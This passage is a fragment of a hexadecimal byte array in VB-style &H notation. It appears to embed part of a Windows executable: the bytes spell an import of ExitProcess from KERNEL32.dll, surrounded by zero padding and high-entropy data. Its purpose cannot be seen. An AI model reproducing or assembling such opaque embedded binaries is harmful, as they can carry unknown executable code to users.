&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HBD&H31&HFE&H09&H07&H9A&H92&H2F&H1B&HDC&HD0&HB0&HEB&HFB&H2D&H98&HDC&HC0&HB7&HBF&H55&HA2&HC5&HF8&HB7&HBB&H79&H28&H77&H1E&H5F&H2B&H42&H97&H28&HFA&H20&H16&HFC&H0C&HFB&HFE&HC2&H6B&H9B&H0A&H74&H46&HA3&HA2&H4A&H6B&HCF&H92&HD5&HDA&H9A&HC2&H20
